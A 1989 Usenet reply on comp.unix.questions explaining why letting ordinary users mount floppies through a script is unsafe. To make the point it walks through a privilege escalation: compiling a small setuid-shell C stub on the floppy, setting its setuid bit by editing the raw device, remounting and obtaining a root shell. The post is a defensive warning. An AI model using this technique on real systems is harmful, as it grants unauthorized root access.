mounting and setuid question...
Randal Schwartz
merlyn at iwarp.intel.com
Wed Dec 13 04:14:41 AEST 1989
In article <23 at gagme.uucp>, gulik at gagme (Gregory Gulik) writes:
| Is it possible to set up a shell script that will
| allow non-super-user people to mount a floppy file system?
Yes... but...
| How should I be doing this?
... you shouldn't.
Mounting a trashed filesystem will take your system down *real* fast.
I suppose you could run fsck on your to-be-mounted floppy, and verify
the exit status, but that sounds like a lot of work, because it
doesn't avoid the second problem... described as so:
(presume mountflop does an fsck followed by a mount, and umountflop
does the reverse).
$ newfs /dev/flop
$ mountflop
$ cd /flop
$ cat >x.c
main() { setuid(geteuid()); exec("/bin/sh","sh",0); }
^D
$ cc x.c -o x
$ cd /
$ umountflop
$ emacs /dev/flop
[find inode table, turn on setuid bit on ./x]
$ mountflop
$ /flop/x
# [a root shell]
Sorry. It's too easy.
(C code deliberately untested for security through obscurity.. :-)
Just another UNIX hacker,
--
/== Randal L. Schwartz, Stonehenge Consulting Services (503)777-0095 ====\
| on contract to Intel's iWarp project, Hillsboro, Oregon, USA, Sol III |
| merlyn at iwarp.intel.com ...!uunet!iwarp.intel.com!merlyn |
\== Cute Quote: "Welcome to Oregon... Home of the California Raisins!" ==/
More information about the Comp.unix.questions
mailing list